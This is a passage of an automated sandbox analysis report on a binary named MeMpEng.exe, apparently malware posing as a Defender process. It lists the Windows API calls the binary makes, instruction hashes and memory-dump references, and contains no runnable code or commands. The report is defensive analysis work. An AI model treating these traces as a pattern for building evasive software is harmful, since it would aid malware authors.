                                                          • Opcode Fuzzy Hash: a35846d0fa1f5f62d1cc44f85dbd038e6f418717e16ba0fa97b0d6e40a5ea598
                                                          • Instruction Fuzzy Hash: 6A216F73904110ABDB20FBA8DEC5A5E72E4AB08324715053BE552B72D5C6BCA8819B9D
                                                          APIs
                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
                                                          • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
                                                          • RegCloseKey.KERNEL32(?), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Enum$CloseValue
                                                          • String ID:
                                                          • API String ID: 397863658-0
                                                          • Opcode ID: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
                                                          • Instruction ID: e355f0d3af3fae611af142f11dea5172e840e8f974d60c5f977c655607c85d86
                                                          • Opcode Fuzzy Hash: 6b26a19a6a49c8cdb85b468f9485b09a4b214ce950142c5c676665e06fea9f6e
                                                          • Instruction Fuzzy Hash: 5801DF71A04605BBEB149F94DE48BAFB668FF80308F10443EF001B21D0D7B84E41976D
                                                          APIs
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402580
                                                          • RegCloseKey.KERNEL32(?), ref: 00402622
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
                                                          • Instruction ID: 6577050f37a29122a5cb82ae63a7e3627040baffe8f236fb698a7bc144352859
                                                          • Opcode Fuzzy Hash: 3b7a533e92f914db3672ef71fd19957ac7f0611522e7cd12c869ba850adf7419
                                                          • Instruction Fuzzy Hash: 51119E71904216EADF15DFA0DA589AEB7B4FF04348F20443FE802B62D0D7B84A45DB5E
                                                          APIs
                                                          • MulDiv.KERNEL32 ref: 004013E4
                                                          • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                          • Instruction ID: cd791cecd07b1aef7d4b508d0a52a2ac0ec5e235a68ccce80931b69816989e44
                                                          • Opcode Fuzzy Hash: 2a9df91d450fb50793c14fb38bc67898e6fb514a90870fda1bdd56b9451edd81
                                                          • Instruction Fuzzy Hash: 6301F4326242109BE7195B389D05B6B36A8F791314F10863FF955F62F1DA78CC42DB4D
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 004056BC
                                                            • Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                                          • OleUninitialize.OLE32 ref: 00405708
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitialize
                                                          • String ID:
                                                          • API String ID: 2896919175-0
                                                          • Opcode ID: b5753e3ad58a69f25ac6974e6d5875c31233b5eee52de9f565f0f637ff460faa
                                                          • Instruction ID: 63975ff93ca4750656595f1bf98ef34e31a5955aa7ce839472b70166dafb6141
                                                          • Opcode Fuzzy Hash: b5753e3ad58a69f25ac6974e6d5875c31233b5eee52de9f565f0f637ff460faa
                                                          • Instruction Fuzzy Hash: BCF0F0B38009009BEA815750AD01B277BA8FBC1305F04883BEF88A22F0DF3A08018B1E
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,?), ref: 00405AEA
                                                          • GetLastError.KERNEL32 ref: 00405AF8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction ID: 13352011552d0ddc4b0c1568d720dcd5f2ba617a9a750a7f60e40e4c0ab4bb23
                                                          • Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
                                                          • Instruction Fuzzy Hash: 52F0F4B0D0060EDADB00CFA4C6487EFBBB4AB04309F10812AD941B6281D7B882488FA9
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
                                                          • Instruction ID: 98303f18ab294370b9404d3d0833ea925ed9fe29ea468c813ed2a63de2513d45
                                                          • Opcode Fuzzy Hash: 43dff4b1693335f93dfca754fceec6b37362f049de9d354dc4597a38bacc65dc
                                                          • Instruction Fuzzy Hash: 28E04F76908610DFE748EBA4AE499AEB7B4FF80365B20497FE001F11E1DBB94D00966D
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                          • CloseHandle.KERNEL32(?), ref: 00405B6D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID:
                                                          • API String ID: 3712363035-0
                                                          • Opcode ID: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                                          • Instruction ID: e42c3092a0fd4a031c4fd4b3b8927d6f3122727aa63034fdce6a98e2e8d9435a
                                                          • Opcode Fuzzy Hash: 1cf2fe051d34b4090bca479d50b9d9e6ed2e29e2a91626cbf83b173b154ad348
                                                          • Instruction Fuzzy Hash: ECE09AB4900249BFEB109F64AD05E7B776CE745644F008525BD10F6151D775A8148A79
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
                                                          • Instruction ID: d7c79e80ad2a22e998040c9ddd7ac57f7a29ae31a8ed4af3f77ef46bec42490e
                                                          • Opcode Fuzzy Hash: 161f1189b96c1e050d17504ce5c39e59e81e919b68ff6b2bf5ceaddda9e07bf6
                                                          • Instruction Fuzzy Hash: 48E04F32A14514ABCB18CBA8EDD086E73B6FB84310310453FE502B36A4C6789C00CB58
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000020,?,0040363F,0000000C,?,?,?,?,?,?,?,?), ref: 0040695A
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00406975
                                                            • Part of subcall function 004068D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068EF
                                                            • Part of subcall function 004068D8: wsprintfW.USER32 ref: 0040692A
                                                            • Part of subcall function 004068D8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040693E
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                          • String ID:
                                                          • API String ID: 2547128583-0
                                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                          • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,004030E2,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00406048
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B16
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                          • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000), ref: 729F2C57
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 3ec64f404223e5d3bc62f202df6fc698b8312ac89c2a2ebf0cfc345235760172
                                                          • Instruction ID: 0583d2b627810a5b698cbbd7d7f8662f06c54e859b47da4e5df78a63d1fe28a6
                                                          • Opcode Fuzzy Hash: 3ec64f404223e5d3bc62f202df6fc698b8312ac89c2a2ebf0cfc345235760172
                                                          • Instruction Fuzzy Hash: 69418273D04204AFDB91DF69D945BE93B78EB44359F3C882EEA09CA540D6389581CB93
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                            • Part of subcall function 0040649B: wsprintfW.USER32 ref: 004064A8
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
